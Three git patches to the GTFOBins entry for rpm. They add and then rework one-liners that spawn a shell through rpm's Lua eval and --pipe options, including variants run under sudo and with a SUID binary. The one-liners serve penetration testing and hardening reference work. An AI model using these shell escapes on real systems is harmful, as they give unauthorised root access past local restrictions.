From 565ebae8809c0d53a2b438b72375d9397556f207 Mon Sep 17 00:00:00 2001 From: M4x Date: Wed, 7 Apr 2021 16:30:36 +0800 Subject: [PATCH 1/3] add `command` for `rpm` and delete unnecessary prefix --- _gtfobins/rpm.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index ba8dafe..433fd38 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -2,8 +2,12 @@ functions: shell: - code: rpm --eval '%{lua:os.execute("/bin/sh")}' + command: + - code: | + rpm --pipe '/bin/id > /tmp/result' + cat /tmp/result limited-suid: - - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}' + - code: rpm --eval '%{lua:os.execute("/bin/sh")}' sudo: - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}' - description: | From ecb1840df3f29e0c61ff48a82bebccfb91df5ddf Mon Sep 17 00:00:00 2001 From: M4x Date: Wed, 7 Apr 2021 17:31:05 +0800 Subject: [PATCH 2/3] add command for rpm and delete unnecessary prefix remove trailing spaces --- _gtfobins/rpm.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 433fd38..133fdb9 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -2,7 +2,7 @@ functions: shell: - code: rpm --eval '%{lua:os.execute("/bin/sh")}' - command: + command: - code: | rpm --pipe '/bin/id > /tmp/result' cat /tmp/result From 9800048833e6cc177b602579f48a7a6d4cb63a47 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 8 Apr 2021 07:56:49 +0200 Subject: [PATCH 3/3] Upgrade to shell --- _gtfobins/rpm.md | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 133fdb9..d1ae142 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -2,12 +2,9 @@ functions: shell: - code: rpm --eval '%{lua:os.execute("/bin/sh")}' - command: - - code: | - rpm --pipe '/bin/id > /tmp/result' - cat /tmp/result + - code: rpm --pipe '/bin/sh 0<&1' limited-suid: - - code: rpm --eval '%{lua:os.execute("/bin/sh")}' + - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}' sudo: - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}' - description: |